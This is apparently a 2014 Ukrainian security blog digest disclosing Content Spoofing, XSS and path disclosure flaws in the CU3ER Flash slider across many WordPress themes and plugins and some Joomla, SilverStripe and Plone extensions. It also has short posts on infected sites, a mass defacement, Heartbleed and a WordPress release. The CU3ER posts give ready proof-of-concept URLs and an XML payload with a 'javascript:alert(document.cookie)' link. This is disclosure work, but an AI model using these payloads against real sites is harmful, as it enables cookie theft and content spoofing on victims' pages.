Добірка уразливостей
17:21 23.04.2014В даній добірці уразливості в веб додатках:
Уразливості в численних темах з CU3ER для WordPress
23:55 22.04.2014Раніше я писав про уразливості в CU3ER. У квітні, 19.04.2014, я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних темах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.
Окрім плагінів, про які я писав, флешка CU3ER також міститься в наступних шаблонах для WordPress: ShapeShifter, Los Angeles, Themebox, Elite Force, Webfolio та інших темах, в тому числі платних і кастом темах розроблених для окремих сайтів.
Content Spoofing (WASC-12):
ShapeShifter:
http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xmlLos Angeles:
http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml
Themebox:
http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml
Директорія також може називатися themebox10 і themebox11Elite Force:
http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xmlWebfolio:
http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml
Cross-Site Scripting (WASC-08):
ShapeShifter:
http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xmlLos Angeles:
http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml
Themebox:
http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml
Директорія також може називатися themebox10 і themebox11Elite Force:
http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xmlWebfolio:
http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2
1.xml:
xss.xml:
Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.
Full path disclosure (WASC-13):
FPD в php-файлах шаблонів (по замовчуванню) або в error_log. В index.php та інших php-файлах.
http://site/wp-content/themes/shapeshifter/
http://site/wp-content/themes/shapeshifter2/
http://site/wp-content/themes/los_angeles/
http://site/wp-content/themes/themebox/
http://site/wp-content/themes/themebox10/
http://site/wp-content/themes/themebox11/
http://site/wp-content/themes/elite_force/
http://site/wp-content/themes/webfolio/
Уразливі всі шаблони з флешкою CU3ER: ShapeShifter 1.x і 2.x, Los Angeles, Themebox 1.1, Elite Force 2.1.0, Webfolio 2.0.2 та попередні версії цих тем.
Інфіковані сайти №192
22:49 22.04.2014Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.
- http://zmr.gov.ua - інфікований державний сай - інфекція була виявлена 03.02.2014. Зараз сайт не входить до переліку підозрілих.
- http://infocom.lviv.ua - інфекція була виявлена 21.04.2014. Зараз сайт не входить до переліку підозрілих.
- http://tazoxox.pp.ua - інфекція була виявлена 19.04.2014. Зараз сайт не входить до переліку підозрілих.
- http://join.com.ua - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.
- http://eizvestia.com - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.
Heartbleed атака проти OpenSSL
20:08 22.04.201412.04.2014
Виявлені уразливості безпеки в OpenSSL. Зокрема одна уразливість дозволяє провести Heartbleed атаку, що дозволяє отримати секретний ключ шифрування на веб сервері і розшифрувати SSL трафік. Що зараз активно використовується для атак в Інтернеті.
Уразливі версії: OpenSSL 1.0.
Витік інформації, відновлення ключа.
- OpenSSL vulnerabilities (деталі)
22.04.2014
Додаткова інформація.
- FreeBSD Security Advisory FreeBSD-SA-14:06.openssl (деталі)
- HP Software Autonomy WorkSite Server (On-Premises Software), Running OpenSSL, Remote Disclosure of Information (деталі)
- HP Autonomy WorkSite Server v9.0 (деталі)
- HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information (деталі)
- HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information (деталі)
- HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information (деталі)
- HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information (деталі)
- HP Software Server Automation, “HeartBleed” OpenSSL Vulnerability, Remote Disclosure of Information (деталі)
- HP Software Service Manager, “HeartBleed” OpenSSL Vulnerability, Remote Disclosure of Information (деталі)
- OpenSSL 1.0.1 library’s “Heart bleed” vulnerability - CVE-2014-0160 (деталі)
- HP Software HP Service Manager, Asset Manager, UCMDB Browser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, Performance Center, “HeartBleed” OpenSSL Vulnerability, Remote Disclosure (деталі)
Добірка експлоітів
17:26 22.04.2014В даній добірці експлоіти в веб додатках:
Уразливості в численних плагінах з CU3ER для WordPress
23:56 19.04.2014Раніше я писав про уразливості в CU3ER. Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних плагінах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.
Вчора я писав про wpCU3ER для WordPress. Флешка CU3ER також міститься в наступних плагінах для WordPress: NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager, Cu3er Slider та інших плагінах, в тому числі кастом плагінах розроблених для окремих сайтів.
Content Spoofing (WASC-12):
NextGen Cu3er Gallery:
http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml
Simple Cu3er:
http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml
Cu3er Post Elements:
http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml
Gallery Manager:
http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml
Cu3er Slider:
http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml
Cross-Site Scripting (WASC-08):
NextGen Cu3er Gallery:
http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml
Simple Cu3er:
http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml
Cu3er Post Elements:
http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml
Gallery Manager:
http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml
Cu3er Slider:
http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml
1.xml:
xss.xml:
Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.
Full path disclosure (WASC-13):
FPD в php-файлах плагінів (по замовчуванню) або в error_log.
http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php та в багатьох php-файлах в підпапках плагіна
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.phpУразливі всі плагіни з флешкою CU3ER: NextGen Cu3er Gallery 0.1, Simple Cu3er 1.0.1, Cu3er Post Elements 0.5.1, Gallery Manager, Cu3er Slider та попередні версії цих плагінів.
Дев’ятий масовий взлом сайтів на сервері Delta-X
22:46 19.04.2014З 24.03.2013 по 29.12.2013 та з 08.01.2014 по 17.04.2014 відбувся дев’ятий масовий взлом сайтів на сервері Delta-X, після восьмого взлому сайтів на сервері Delta-X. Нещодавно я вже розповідав про інші масові взломи.
Був взломаний новий сервер компанії Delta-X. Взлом складався з багатьох окремих дефейсів. 20 сайтів були дефейснуті в 2013 році та 56 сайтів в 2014 році.
Всього було взломано 77 сайтів на сервері української компанії Delta-X (IP 91.222.136.250). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт www.yarmrda.gov.ua.
Дефейси по одному сайту булу проведені хакерами kwgdeface, SlimeDont, C37HUN, Your Nick, InFlaMeS, ChatLak, jhoker, kazmil Hacker, m05l3k, FAMUR, Cogniti0, kwgdeface, default, Moroccan Hassan, CeLLaTReiS, 5 сайтів хакером Hmei7, 16 сайтів хакером HighTech та 41 сайт хакером d3b~X.
Враховуючи велику кількість окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів.
Вийшов WordPress 3.8.2
20:31 19.04.2014У квітні, 08.04.2014, вийшла нова версія WordPress 3.8.2. Разом з нею вийшла версія 3.7.2 з виправлення тих самих уразливостей.
WordPress 3.8.2 це багфікс та секюріті випуск нової 3.8 серії. В якому розробники виправили 9 багів та 5 уразливостей.
Серед виправлених уразливостей дві дірки та три “посилення безпеки”. Це підробка кукісів (authentication cookie forgery) та privilege escalation уразливість, що дозволяла користувачам з правами Contributor публікувати пости.
Серер посилень безпеки наступні: покращення pingbacks (виправлена уразливість, що дозволяла проводити DoS атаки через пінгбеки), виправлена SQL Injection в адмінці та виправлена XSS в бібліотеці Plupload, що постачається з WP.
Підміна SSL з’єднань в Mozilla NSS
17:26 19.04.2014Виявлена можливість підміни SSL з’єднань в Mozilla Network Security Services (NSS).
Уразливі версії: Mozilla NSS 3.15.
Некоректна реалізація TLS False Start.
- NSS vulnerability (деталі)
Уразливості в плагінах з CU3ER для WordPress, Joomla, SilverStripe і Plone
23:51 18.04.201426.11.2013
Раніше я писав про уразливості в CU3ER. У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в веб додатку CU3ER та численних плагінах. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.
Детальна інформація про уразливості з’явиться пізніше.
18.04.2014
Флешка CU3ER міститься в wpCU3ER для WordPress, jCU3ER і Vinaora Cu3er 3D Slide-show для Joomla, cu3er-silverstripe-extension для SilverStripe, collective.cu3er для Plone та багатьох інших плагінах. І всі вони мають Content Spoofing та XSS уразливості.
Адреси флешки в різних плагінах:
http://site/wp-content/uploads/wpcu3er/CU3ER.swf
В старих версіях плагіна:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf
http://site/components/com_cu3er/flash/CU3ER.swf
http://site/media/mod_vinaora_cu3er/flash/cu3er.swf
http://site/cu3er-silverstripe-extension/flash/cu3er.swf
http://site/collective/cu3er/browser/flash/cu3er.swf
Перші два плагіни використовують останню версію CU3ER, а три інші плагини використовують версію 0.9.2 (а також в старих версіях wp-cu3er).
Content Spoofing (WASC-12):
http://site/cu3er.swf?xml=http://site2/1.xml
1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>
Cross-Site Scripting (WASC-08):
http://site/cu3er.swf?xml=http://site2/xss.xml
xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>
Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.
Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.
CS (WASC-12):
http://site/cu3er.swf?xml_location=http://site2/1.xml
XSS (WASC-08):
http://site/cu3er.swf?xml_location=http://site2/xss.xml
Уразливі всі плагіни з флешкою CU3ER: wpCU3ER 0.75, jCU3ER 0.12, Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1, cu3er-silverstripe-extension, collective.cu3er 0.1 та попередні версії цих плагінів.
